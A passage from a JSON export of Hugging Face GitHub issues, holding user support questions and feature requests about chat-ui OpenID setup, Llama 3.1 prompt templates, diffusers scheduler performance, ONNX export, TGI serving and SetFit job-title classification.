Is it possible to add a pin for multiprocess so something like `multiprocess<=0.70.16` so that the `dill` version is compatible?\n\n### Steps to reproduce the bug\n\nNA\n\n### Expected behavior\n\nNA\n\n### Environment info\n\nNA", "url": "https://github.com/huggingface/datasets/issues/7186", "state": "closed", "labels": [], "created_at": "2024-10-01T22:29:32Z", "updated_at": "2024-10-02T06:08:24Z", "comments": 0, "user": "shubhbapna" }, { "repo": "huggingface/chat-ui", "number": 1499, "title": "Error 500 \"RPError\" | OpenID Connect + SafeNet Trusted Access (STA)", "body": "Hello,\r\n\r\nI would like to deploy OpenID Connect with SafeNet Trusted Access (STA).\r\n\r\nFrom this 3-minute video, I've done all the steps, except for OAuth.tools which I don't use :\r\nhttps://www.youtube.com/watch?v=hSWXFSadpQQ\r\n\r\nHere's my bash script that deploys the containers | ```deploy.sh``` :\r\n\r\n```bash\r\n#!/bin/bash\r\n\r\n# previous containers removed\r\nsudo docker rm -f ollama\r\nsudo docker rm -f mongodb\r\nsudo docker rm -f chat-ui\r\nsudo docker rm -f nginx\r\n\r\n# previous networks removed\r\nsudo docker network rm backend >/dev/null 2>&1\r\nsudo docker network rm proxy >/dev/null 2>&1\r\n\r\n# create networks\r\nsudo docker network create backend\r\nsudo docker network create proxy\r\n\r\n# ollama\r\nsudo docker run -d -p 11434:11434 -e HTTPS_PROXY=\"${HTTPS_PROXY}\" -v /home//chat-ui/ollama:/root/.ollama --name ollama --network backend ollama-with-ca\r\nsleep 5\r\nsudo docker exec ollama taskset -c 0-40 ollama run llama3.1\r\n\r\n# mongodb\r\nsudo docker run -d -p 27017:27017 -v mongodb-data:/data/db --name mongodb --network backend mongo:latest\r\n\r\n# chat-ui\r\nsudo docker run -d -p 3000:3000 -e HTTPS_PROXY=\"${HTTPS_PROXY}\" --mount type=bind,source=\"$(pwd)/.env.local\",target=/app/.env.local -v chat-ui:/data --name chat-ui --network backend ghcr.io/huggingface/chat-ui-db\r\nsudo docker network connect proxy chat-ui\r\n\r\n# nginx\r\nsudo docker run -d -p 80:80 -p 443:443 -v \"$(pwd)/nginx:/etc/nginx/conf.d\" -v \"$(pwd)/ssl:/etc/ssl\" --name nginx --network proxy nginx:latest\r\n```\r\n\r\nHere's my ```nginx``` configuration :\r\n\r\n```nginx\r\nserver {\r\n listen 80 default_server;\r\n listen [::]:80 default_server;\r\n server_name .fr;\r\n return 301 https://$host$request$uri;\r\n}\r\n\r\nserver {\r\n listen 443 ssl;\r\n server_name .fr; \r\n ssl_certificate /etc/ssl/chat-ui.crt;\r\n ssl_certificate_key /etc/ssl/chat-ui.key;\r\n\r\n proxy_connect_timeout 60;\r\n proxy_send_timeout 60;\r\n proxy_read_timeout 60;\r\n send_timeout 60;\r\n client_max_body_size 2G;\r\n proxy_buffering off;\r\n client_header_buffer_size 8k;\r\n\r\n location / {\r\n proxy_pass http://chat-ui:3000;\r\n proxy_set_header Host $host;\r\n proxy_set_header X-Real-IP $remote_addr;\r\n proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\r\n proxy_set_header X-Forwarded-Proto $scheme;\r\n\r\n add_header 'Access-Control-Allow-Origin' 'https://.fr' always;\r\n }\r\n}\r\n```\r\n\r\nFinally, here's my ```.env.local``` using Llama3.1 8B model :\r\n\r\n```.env\r\nMONGODB_URL=mongodb://mongodb:27017\r\nHF_TOKEN=hf_*****\r\n\r\nOPENID_CONFIG=`{\r\n \"PROVIDER_URL\": \"https://idp.eu.safenetid.com/auth/realms/-STA/protocol/openid-connect/auth\",\r\n \"CLIENT_ID\": \"*****\",\r\n \"CLIENT_SECRET\": \"*****\",\r\n \"SCOPES\": \"openid profile\"\r\n}`\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Ollama | Llama3.1\",\r\n \"id\": \"llama3.1-8b\",\r\n \"description\": \"llama3.1-8b\",\r\n \"chatPromptTemplate\": 
\"<|begin_of_text|>{{#if @root.preprompt}}<|start_header_id|>system<|end_header_id|>\\n\\n{{@root.preprompt}}<|eot_id|>{{/if}}{{#each messages}}{{#ifUser}}<|start_header_id|>user<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifUser}}{{#ifAssistant}}<|start_header_id|>assistant<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifAssistant}}{{/each}}<|start_header_id|>assistant<|end_header_id|>\\n\\n\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_text|>\", \"<|eot_id|>\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"url\" : \"http://ollama:11434\",\r\n \"ollamaName\" : \"llama3.1:latest\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\n\r\nAnd I got this error when I press on \"Login\" button : \r\n\r\n![login-button-pressed](https://github.com/user-attachments/assets/0e0846d1-8737-4b18-9607-51ee7f50adb9)\r\n\r\nWhen I do the command ```sudo docker logs chat-ui```, I see this line :\r\n\r\n```{\"level\":50,\"time\":1727703253975,\"pid\":30,\"hostname\":\"fe9d8f548283\",\"locals\":{\"sessionId\":\"3b700cd7b4efc2a2b47c0f13134904e01f01c3b7d6ff05c6726390e19ea5d431\"},\"url\":\"https://ia.chu-lyon.fr/login\",\"params\":{},\"request\":{},\"message\":\"Internal Error\",\"error\":{\"name\":\"RPError\"},\"errorId\":\"8d7d74e3-b12c-4c1e-9dc5-9847d5e61ea2\",\"status\":500}```\r\n\r\n**Note that by adding the ```OPENID_CONFIG``` (with probably incorrect data), the application stops working completely and I can't launch prompts or delete/edit existing ones !**\r\n\r\n**When I comment ```OPENID_CONFIG```, everything starts working properly again.**\r\n\r\nI don't really know what to put exactly, especially for ```PROVIDER_URL``` and ```SCOPES```.\r\n\r\nCan you help me to resolve this issue ?\r\n\r\nThanks in advance.", "url": "https://github.com/huggingface/chat-ui/issues/1499", "state": "open", "labels": [ "support" ], "created_at": "2024-09-30T12:54:16Z", "updated_at": "2024-09-30T12:57:51Z", "comments": 0, "user": "avirgos" }, { "repo": "huggingface/diffusers", "number": 9560, "title": "FP32 training for sd3 controlnet", "body": "Hi,\r\nI have been use `examples\\controlnet\\train_controlnet_sd3.py` for controlnet training for a while, and I have some confusion and would like your advice\r\n\r\n1. In the line 1097:\r\n`vae.to(accelerator.device, dtype=torch.float32)`\r\nIt seems we should use fp32 for VAE, but as far as I know, SD3 currently has no fp32 checkpoints, so does it really work if we populate fp16 into fp32?\r\n\r\n2. 
Before running the train script, `accelerate config` can specify whether to use mixed precision or not, since SD3 only has fp16 checkpoint at present, I don't know how to choose this option, whether to choose 'fp16' or 'no'.\r\n\r\nReally appreciate your advice!\r\n@sayakpaul @DavyMorgan \r\n", "url": "https://github.com/huggingface/diffusers/issues/9560", "state": "closed", "labels": [ "stale" ], "created_at": "2024-09-30T08:07:04Z", "updated_at": "2024-10-31T15:13:19Z", "comments": 11, "user": "xduzhangjiayu" }, { "repo": "huggingface/huggingface_hub", "number": 2578, "title": "What is the highest Python version currently supported?", "body": "### Describe the bug\n\nI utilized Hugging Face Spaces to construct my application, which was built using Gradio, zerogpuspace, and the link is: https://huggingface.co/spaces/tanbw/CosyVoice\r\nIn the readme.md, I specified the Python version as 3.8.9, but the version of Python that the application prints out is still 3.1. What is the highest Python version currently supported?\r\n![image](https://github.com/user-attachments/assets/3a6e426c-2cef-485e-b1b7-8a6edab1cd65)\r\n\r\n![image](https://github.com/user-attachments/assets/0afc1e2a-8014-4130-9426-1effeebbfbfa)\r\n\r\n![image](https://github.com/user-attachments/assets/9731452b-5535-450e-9ece-32741216ca79)\r\n\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n_No response_\n\n### System info\n\n```shell\n- huggingface_hub version: 0.24.5\r\n- Platform: Linux-5.10.223-211.872.amzn2.x86_64-x86_64-with-glibc2.36\r\n- Python version: 3.10.13\r\n- Running in iPython ?: No\r\n- Running in notebook ?: No\r\n- Running in Google Colab ?: No\r\n- Token path ?: /home/user/.cache/huggingface/token\r\n- Has saved token ?: False\r\n- Configured git credential helpers: store\r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: 2.0.1\r\n- Jinja2: 3.1.4\r\n- Graphviz: N/A\r\n- keras: N/A\r\n- Pydot: N/A\r\n- Pillow: 10.4.0\r\n- hf_transfer: 0.1.8\r\n- gradio: 4.44.0\r\n- tensorboard: N/A\r\n- numpy: 1.26.4\r\n- pydantic: 2.7.0\r\n- aiohttp: 3.10.0\r\n- ENDPOINT: https://huggingface.co\r\n- HF_HUB_CACHE: /home/user/.cache/huggingface/hub\r\n- HF_ASSETS_CACHE: /home/user/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /home/user/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: True\r\n- HF_HUB_ETAG_TIMEOUT: 10\r\n- HF_HUB_DOWNLOAD_TIMEOUT: 10\n```\n", "url": "https://github.com/huggingface/huggingface_hub/issues/2578", "state": "closed", "labels": [ "bug" ], "created_at": "2024-09-29T14:37:38Z", "updated_at": "2024-09-30T07:05:29Z", "user": "tanbw" }, { "repo": "huggingface/diffusers", "number": 9555, "title": "[Flux Controlnet] Add control_guidance_start and control_guidance_end", "body": "It'd be nice to have `control_guidance_start` and `control_guidance_start` parameters added to flux Controlnet and Controlnet Inpainting pipelines.\r\n\r\nI'm currently making experiments with Flux Controlnet Inpainting but the results are poor even with a `controlnet_conditioning_scale` set to 0.6. 
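For reference, the SD/SDXL ControlNet pipelines already expose this windowing, which is what this request asks to mirror in the Flux pipelines. A usage sketch with the existing parameter names, where `pipe` is assumed to be a loaded `StableDiffusionControlNetPipeline` and `control_image` a prepared conditioning image:

```python
# apply the controlnet only for the first 60% of denoising steps, then release it
image = pipe(
    "a photo of a living room",
    image=control_image,
    controlnet_conditioning_scale=0.6,
    control_guidance_start=0.0,
    control_guidance_end=0.6,
).images[0]
```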
\r\n\r\nI have to set `controlnet_conditioning_scale` to 0.4 to have non broken results.\r\n\r\nMaybe giving more control with the guidance start and end would help reach better results ?\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9555", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2024-09-29T12:37:39Z", "updated_at": "2024-10-10T12:29:03Z", "comments": 8, "user": "simbrams" }, { "repo": "huggingface/hub-docs", "number": 1435, "title": "How to check if a space is duplicated from another one using HF API?", "body": "I cannot find any related specifications in the documentation...Thanks!", "url": "https://github.com/huggingface/hub-docs/issues/1435", "state": "open", "labels": [], "created_at": "2024-09-28T23:52:08Z", "updated_at": "2025-01-16T17:08:34Z", "user": "zhimin-z" }, { "repo": "huggingface/diffusers", "number": 9551, "title": "How to use x-labs flux controlnet models in diffusers?", "body": "### Model/Pipeline/Scheduler description\r\n\r\nThe following controlnets are supported in Comfy UI, but was wondering how we can use these in diffusers as well for developers. Afaik, there is no from_single_file method for FluxControlNet to load the safetensors?\r\n\r\n### Open source status\r\n\r\n- [x] The model implementation is available.\r\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\r\n\r\n### Provide useful links for the implementation\r\n\r\nhttps://huggingface.co/XLabs-AI/flux-controlnet-canny\r\nhttps://huggingface.co/XLabs-AI/flux-controlnet-canny-v3\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9551", "state": "closed", "labels": [], "created_at": "2024-09-28T20:01:15Z", "updated_at": "2024-09-29T06:59:46Z", "user": "neuron-party" }, { "repo": "huggingface/text-generation-inference", "number": 2583, "title": "How to turn on the KV cache when serve a model?", "body": "### System Info\n\nTGI 2.3.0\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nThe TTFT is really slower than VLLM. Can't be improved? if so how to turn on the KV cache when launch a model?\r\n\r\n```\r\nmodel=HuggingFaceH4/zephyr-7b-beta\r\n# share a volume with the Docker container to avoid downloading weights every run\r\nvolume=$PWD/data\r\n\r\ndocker run --gpus all --shm-size 1g -p 8080:80 -v $volume:/data \\\r\n ghcr.io/huggingface/text-generation-inference:2.3.0 --model-id $model\r\n```\n\n### Expected behavior\n\nImprove the TTFT and latency ", "url": "https://github.com/huggingface/text-generation-inference/issues/2583", "state": "open", "labels": [], "created_at": "2024-09-28T19:32:15Z", "updated_at": "2024-10-25T12:47:02Z", "user": "hahmad2008" }, { "repo": "huggingface/transformers.js", "number": 948, "title": "Getting Local models/wasm working with Create React App", "body": "### Question\n\nI realize there's been a lot of talk about this in other issues, but I'm trying to gather if getting local-only model and wasm files will work with Create React App. I'm using `WhisperForConditionalGeneration` from `@huggingface/transformers` version `3.0.0-alpha.9`. \r\n\r\nMy setup:\r\n```\r\nenv.allowRemoteModels = false;\r\nenv.allowLocalModels = true;\r\nenv.backends.onnx.wasm.wasmPaths = process.env.PUBLIC_URL + \"/dictation/\";\r\nenv.localModelPath = process.env.PUBLIC_URL + \"/dictation/models/\";\r\n```\r\n... 
and in my `{packagename}/public/models` folder I've got:\r\n```\r\nort-wasm-simd-threaded.jsep.wasm\r\nmodels/config.json\r\nmodels/generation_config.json\r\nmodels/preprocessor_config.json\r\nmodels/tokenizer_config.json\r\nmodels/tokenizer.json\r\nmodels/onnx/decoder_model_merged_q4.onnx\r\nmodels/onnx/encoder_model.onnx\r\n```\r\nThis returns the `SyntaxError: Unexpected token '<', \"\r\n\r\nI wonder how can we localize questions like this. I've tried \u2318R+ which always gives me the local time of Paris. Qwen2.5-72B and Llama 3.1 make up another non-specific time that's not my local time. I have web-search enabled too, and I can see that they're using it too, but they can't get it right, even when I give them my exact location both in the model's system prompt on HuggingChat, or in the chat context of the app itself.\r\n", "url": "https://github.com/huggingface/chat-macOS/issues/7", "state": "open", "labels": [ "good first issue" ], "created_at": "2024-09-24T23:09:31Z", "updated_at": "2024-10-23T20:08:57Z", "user": "Reza2kn" }, { "repo": "huggingface/diffusers", "number": 9520, "title": "UNetMotionModel.dtype is really expensive to call, is it possible to cache it during inference?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\nwe are using class UNetMotionModel(ModelMixin, ConfigMixin, UNet2DConditionLoadersMixin, PeftAdapterMixin)\r\nand its `forward()` implementation is calling self.dtype, which is very expensive\r\n![image](https://github.com/user-attachments/assets/cb840057-ccf7-46ed-847d-2c8aef292fe9)\r\nfrom my profiling trace result, calling self.dtype takes 6-10ms each time.\r\ncan we somehow cache it to save time?\r\n![image](https://github.com/user-attachments/assets/b5ef3c1e-ee9f-4f02-922e-854ebe269568)\r\n\r\nI took a look at ModelMixin.dtype() property function, it get all parameters of the model into tuple to check only first parameter's dtype, i don't thinkmake sense to do this everytime. right?\r\n![image](https://github.com/user-attachments/assets/b74a8c31-0b4e-44cb-ab09-e3f7c5559dad)\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\nWe are using this model to do video generation, so the inference is running repeatedly. 
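Until something lands upstream for the `dtype` cost described in this report, a workaround sketch: memoize the `dtype` property on a subclass. It assumes the model's dtype never changes after loading (a later `.to()`/`.half()` would leave the cache stale):

```python
from diffusers import UNetMotionModel


class CachedDtypeUNetMotionModel(UNetMotionModel):
    """Memoize ModelMixin.dtype so forward() stops walking every parameter."""

    @property
    def dtype(self):
        cached = getattr(self, "_cached_dtype", None)
        if cached is None:
            # same answer ModelMixin computes, but done once instead of per call
            cached = next(self.parameters()).dtype
            self._cached_dtype = cached
        return cached
```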
Is it easy to optimize this ~10ms latency?\r\nThanks!", "url": "https://github.com/huggingface/diffusers/issues/9520", "state": "closed", "labels": [ "wip", "performance" ], "created_at": "2024-09-24T18:03:28Z", "updated_at": "2025-01-02T13:40:51Z", "comments": 7, "user": "xiang9156" }, { "repo": "huggingface/chat-ui", "number": 1484, "title": "Header prompt displayed using Llama3.1 with ollama", "body": "Hello,\r\n\r\nI'm using the ```llama3.1:latest``` model with ```ollama``` and I'm having trouble correctly initializing the ```chatPromptTemplate``` variable.\r\n\r\nI used this Github issue to initialize this variable : https://github.com/huggingface/chat-ui/issues/1035 \r\n\r\nHere is my ```.env.local``` file :\r\n\r\n```.env\r\nMONGODB_URL=mongodb://mongodb:27017\r\nHF_TOKEN=\r\n\r\nPUBLIC_APP_NAME=\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Ollama | Llama3.1\",\r\n \"chatPromptTemplate\": \"<|begin_of_text|>{{#if @root.preprompt}}<|start_header_id|>system<|end_header_id|>\\n\\n{{@root.preprompt}}<|eot_id|>{{/if}}{{#each messages}}{{#ifUser}}<|start_header_id|>user<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifUser}}{{#ifAssistant}}<|start_header_id|>assistant<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_text|>\", \"<|eot_id|>\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"url\" : \"http://ollama:11434\",\r\n \"ollamaName\" : \"llama3.1:latest\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\n\r\nBut ```<|start_header_id|>assistant<|end_header_id|>``` appears on every response :\r\n\r\n![chat-ui-screen](https://github.com/user-attachments/assets/5cb3919e-0ee8-4335-8a53-d811818612e9)\r\n\r\nCan you help me make it disappear by modifying ```chatPromptTemplate``` variable ?\r\n\r\nThanks in advance.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1484", "state": "closed", "labels": [ "support" ], "created_at": "2024-09-24T13:33:16Z", "updated_at": "2024-09-30T08:43:06Z", "comments": 3, "user": "avirgos" }, { "repo": "huggingface/diffusers", "number": 9508, "title": "AnimateDiff SparseCtrl RGB does not work as expected", "body": "Relevant comments are [this](https://github.com/huggingface/diffusers/pull/8897#issuecomment-2255416318) and [this](https://github.com/huggingface/diffusers/pull/8897#issuecomment-2255478105).\r\n\r\nAnimateDiff SparseCtrl RGB does not work similar to other implementations and cannot replicate their outputs. This makes me believe that there is something incorrect with our SparseControlNet or MotionAdapter implementation.\r\n\r\nWhen comparing the results of the [original](https://github.com/guoyww/AnimateDiff)/[Comfy](https://github.com/Kosinkadink/ComfyUI-AnimateDiff-Evolved) implementation to Diffusers implementation, one can notice that if an image is used with an unrelated prompt, the Diffusers implementation ignores the image and just follows the prompt whereas the other implementations try to incorporate both.\r\n\r\nSince the original and Comfy implementations produce this behaviour consistently, this seems more like a problem with Diffusers implementation. However, I've not been able to spot differences in implementation just by comparing the code visually. I also tried matching outputs layerwise and it seemed to be alright (although I didn't investigate this as deeply as I should have due to other priorities). 
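On the layerwise-matching route mentioned in this report, a small sketch for locating the first diverging block: record every submodule's output from the two implementations on identical inputs, then compare by name:

```python
import torch


def record_outputs(model, store):
    """Attach forward hooks that stash each submodule's tensor output by name."""
    handles = []
    for name, module in model.named_modules():
        def hook(mod, args, output, name=name):
            if isinstance(output, torch.Tensor):
                store[name] = output.detach().float().cpu()
        handles.append(module.register_forward_hook(hook))
    return handles


# usage sketch: fill store_a / store_b from the two implementations, then
# diffs = {n: (store_a[n] - store_b[n]).abs().max() for n in store_a if n in store_b}
# the first name with a large diff points at the mismatched layer
```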
\r\n\r\nIf someone from the community actively following/using the AnimateDiff implementations can help determine the cause of this bug, it would be really awesome and helpful.", "url": "https://github.com/huggingface/diffusers/issues/9508", "state": "open", "labels": [ "bug", "help wanted", "stale", "contributions-welcome", "advanced" ], "created_at": "2024-09-23T21:42:54Z", "updated_at": "2025-08-10T16:47:50Z", "comments": 9, "user": "a-r-r-o-w" }, { "repo": "huggingface/lerobot", "number": 451, "title": " Inquiry about Implementation of \"Aloha Unleashed\" ", "body": "First and foremost, I would like to extend my heartfelt gratitude for your incredible work on the LeRobot project. \r\n\r\nI recently came across the paper \"Aloha Unleashed\" published by the Aloha team a few months ago, and I am curious to know if there are any plans to implement the methodologies and findings from this paper into the LeRobot project.\r\n\r\nThank you once again for your hard work and for providing such a fantastic tool to the community. I look forward to your response.\r\n\r\npaper link\uff1ahttps://aloha-unleashed.github.io/", "url": "https://github.com/huggingface/lerobot/issues/451", "state": "open", "labels": [ "question", "robots" ], "created_at": "2024-09-23T09:14:56Z", "updated_at": "2025-08-20T19:42:37Z", "user": "lightfate" }, { "repo": "huggingface/text-generation-inference", "number": 2541, "title": "How to serve local models with python package (not docker)", "body": "### System Info\n\n`pip install text-generation` with version '0.6.0'\r\nI need to use the python package, not docker\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n```\r\nfrom text_generation import Client\r\n\r\n# Initialize the client\r\nclient = Client(\"/path/to/model/locally\")\r\n\r\n# Generate text\r\nresponse = client.generate(\"Your input text here\")\r\n```\r\n\r\nerror:\r\n```\r\nMissingSchema: Invalid URL '/path/to/model/locally': No scheme supplied. Perhaps you meant [/path/to/model/locally](/path/to/model/locally?\r\n```\r\n\r\nI also tried this with some models on huggingface, and local models don't work either!\r\n\r\n```\r\nfrom text_generation import InferenceAPIClient\r\nclient = InferenceAPIClient(\"NousResearch/Meta-Llama-3.1-8B-Instruct\")\r\ntext = client.generate(\"Why is the sky blue?\").generated_text\r\nprint(text)\r\n# ' Rayleigh scattering'\r\n\r\n# Token Streaming\r\ntext = \"\"\r\nfor response in client.generate_stream(\"Why is the sky blue?\"):\r\n if not response.token.special:\r\n text += response.token.text\r\n\r\nprint(text)\r\n```\r\n\r\n\r\nerror:\r\n```\r\nNotSupportedError: Model `NousResearch/Meta-Llama-3.1-8B-Instruct` is not available for inference with this client. 
\r\nUse `huggingface_hub.inference_api.InferenceApi` instead.\r\n```\n\n### Expected behavior\n\n- I can load any model (local or from the HF hub)\r\n\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/2541", "state": "open", "labels": [], "created_at": "2024-09-20T21:10:09Z", "updated_at": "2024-09-26T06:55:50Z", "user": "hahmad2008" }, { "repo": "huggingface/competitions", "number": 41, "title": "how to debug a script submission", "body": "is there a way to see logs or errors of a script-based submission", "url": "https://github.com/huggingface/competitions/issues/41", "state": "closed", "labels": [], "created_at": "2024-09-20T18:04:44Z", "updated_at": "2024-09-30T16:08:42Z", "user": "ktrapeznikov" }, { "repo": "huggingface/diffusers", "number": 9485, "title": "Can we allow making everything on gpu/cuda for scheduler?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\nIs it possible to allow setting every tensor attribute of the scheduler to a cuda device?\r\nIn https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_lcm.py\r\nIt looks like attributes such as `scheduler.alphas_cumprod` are tensors on cpu, but scheduler.set_timesteps() allows setting `scheduler.timesteps` to a gpu/cuda device. Isn't this causing a device mismatch when indexing scheduler.alphas_cumprod with scheduler.timesteps? Below is the code snippet where the pipeline is indexing a cpu tensor (alphas_cumprod) with a gpu tensor (timestep)\r\n![image](https://github.com/user-attachments/assets/42b31655-0b4f-4623-9524-5d55bf7b7f5c)\r\nI simply added the following lines to print the timestep and self.alphas_cumprod type and device at the beginning of `scheduler.step()`\r\n```\r\nprint(\"Printing scheduler.step() timestep\")\r\nprint(type(timestep))\r\nprint(isinstance(timestep, torch.Tensor))\r\nprint(timestep.device)\r\nprint(\"Printing scheduler.step() self.alphas_cumprod\")\r\nprint(type(self.alphas_cumprod))\r\nprint(isinstance(self.alphas_cumprod, torch.Tensor))\r\nprint(self.alphas_cumprod.device)\r\n``` \r\nOutput when running text-to-image:\r\n```\r\nPrinting scheduler.step() timestep\r\n\r\nTrue\r\ncuda:0\r\nPrinting scheduler.step() self.alphas_cumprod\r\n\r\nTrue\r\ncpu\r\n```\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\nWe are using a modified LCMScheduler (99% the same as the original LCMScheduler) for video generation; it's generating frames repeatedly in a loop. Most of the time, this step doesn't cause a performance issue. But we did see intermittent high cpu usage and latency for `alpha_prod_t = self.alphas_cumprod[timestep]`. And from torch.profiler and tracing output, it shows high latency for this specific step. 
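One workaround in line with the report above (my assumption, not an official diffusers recommendation) is to move the lookup table to the sampling device once, outside the frame loop:

```python
from diffusers import LCMScheduler  # the stock scheduler, for illustration

scheduler = LCMScheduler()
scheduler.set_timesteps(num_inference_steps=4, device="cuda")  # assumes a GPU

# Hypothetical one-time fix: with alphas_cumprod on the same device as the
# timesteps, alpha_prod_t = self.alphas_cumprod[timestep] indexes GPU-to-GPU
# instead of mixing a GPU scalar with a CPU tensor on every step.
scheduler.alphas_cumprod = scheduler.alphas_cumprod.to("cuda")
```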
We are wondering if this is the performance bottleneck.\r\n![image](https://github.com/user-attachments/assets/04f5040b-734c-46a6-8171-17a30f221b14)\r\n\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9485", "state": "open", "labels": [ "stale", "scheduler", "performance" ], "created_at": "2024-09-20T12:38:16Z", "updated_at": "2024-12-17T15:04:46Z", "comments": 14, "user": "xiang9156" }, { "repo": "huggingface/optimum", "number": 2032, "title": "ONNX support for decision transformers", "body": "### Feature request\r\n\r\nI am trying to train off-line RL using decision transformer, convert to .onnx.\r\n\r\n```\r\nfrom pathlib import Path\r\nfrom transformers.onnx import FeaturesManager\r\n\r\nfeature = \"sequence-classification\"\r\n\r\n# load config\r\nmodel_kind, model_onnx_config = FeaturesManager.check_supported_model_or_raise(model, feature=feature)\r\nonnx_config = model_onnx_config(model.config)\r\n\r\n# export\r\nonnx_inputs, onnx_outputs = transformers.onnx.export(\r\n #preprocessor=tokenizer,\r\n model=model,\r\n config=onnx_config,\r\n opset=13,\r\n output=Path(\"trained_models/DT-model.onnx\")\r\n)\r\n```\r\n\r\nGet the below error:\r\n\r\n```\r\nKeyError: \"decision-transformer is not supported yet. Only ['albert', 'bart', 'beit', 'bert', 'big-bird', 'bigbird-pegasus', 'blenderbot', 'blenderbot-small', 'bloom', 'camembert', 'clip', 'codegen', 'convbert', 'convnext', 'data2vec-text', 'data2vec-vision', 'deberta', 'deberta-v2', 'deit', 'detr', 'distilbert', 'electra', 'flaubert', 'gpt2', 'gptj', 'gpt-neo', 'groupvit', 'ibert', 'imagegpt', 'layoutlm', 'layoutlmv3', 'levit', 'longt5', 'longformer', 'marian', 'mbart', 'mobilebert', 'mobilenet-v1', 'mobilenet-v2', 'mobilevit', 'mt5', 'm2m-100', 'owlvit', 'perceiver', 'poolformer', 'rembert', 'resnet', 'roberta', 'roformer', 'segformer', 'squeezebert', 'swin', 't5', 'vision-encoder-decoder', 'vit', 'whisper', 'xlm', 'xlm-roberta', 'yolos'] are supported. If you want to support decision-transformer please propose a PR or open up an issue.\"\r\n```\r\n\r\n### Motivation\r\n\r\nI would want to use trained models in Godot-RL-Agents. Currently agents are trained using PPO OR imitation learning and bothe support onnx format. Supporting decision transformers could hugely help training models navigating complex scenarios.\r\n\r\n### Your contribution\r\n\r\nI would be interested to raise a PR. But at this time, I have no idea how to go about this. With little bit of guidance, I can try.", "url": "https://github.com/huggingface/optimum/issues/2032", "state": "closed", "labels": [ "onnx" ], "created_at": "2024-09-20T08:45:28Z", "updated_at": "2024-11-25T13:00:02Z", "comments": 1, "user": "ra9hur" }, { "repo": "huggingface/setfit", "number": 558, "title": "How to improve the accuracy while classifying short text with less context", "body": "Hi, my usecase is to classify Job Title into Functional Areas. I finetuned `all-mpnet-base-v2` with the help of setfit by providing some 10+ examples for each class (Functional Areas). \r\n\r\nI got `82%` accuracy on running the evaluation on my test set. 
I observed some of the simple & straightforward job titles are classified into wrong label with `0.6` score.\r\n\r\nFor example:\r\n```\r\nQuery: SDET\r\nPredicted Label: Big Data / DWH / ETL\r\nConfidence Scores:\r\nLabel: Accounting / Finance, Confidence: 0.0111\r\nLabel: Backend Development, Confidence: 0.0140\r\nLabel: Big Data / DWH / ETL, Confidence: 0.6092\r\n```\r\n\r\nHere **SDET** should have labelled as `QA / SDET` but it is classified to `Big Data / DWH / ETL` with `0.62` score. Few shot examples used for both classes doesn't have anything in common which could confuse the model except one example whose title is `Data Quality Engineer` and it is under `Big Data / DWH / ETL`.\r\n\r\n**Few shot examples** (added only for 2 here)\r\n```py\r\n{ \"QA / SDET\": [\r\n \"Quality Assurance Engineer\",\r\n \"Software Development Engineer in Test (SDET)\",\r\n \"QA Automation Engineer\",\r\n \"Test Engineer\",\r\n \"QA Analyst\",\r\n \"Manual Tester\",\r\n \"Automation Tester\",\r\n \"Performance Test Engineer\",\r\n \"Security Test Engineer\",\r\n \"Mobile QA Engineer\",\r\n \"API Tester\",\r\n \"Load & Stress Test Engineer\",\r\n \"Senior QA Engineer\",\r\n \"Test Automation Architect\",\r\n \"QA Lead\",\r\n \"QA Manager\",\r\n \"End-to-End Tester\",\r\n \"Game QA Tester\",\r\n \"UI/UX Tester\",\r\n \"Integration Test Engineer\",\r\n \"Quality Control Engineer\",\r\n \"Test Data Engineer\",\r\n \"DevOps QA Engineer\",\r\n \"Continuous Integration (CI) Tester\",\r\n \"Software Test Consultant\"\r\n ],\r\n \r\n \"Big Data / DWH / ETL\": [\r\n \"Big Data Engineer\",\r\n \"Data Warehouse 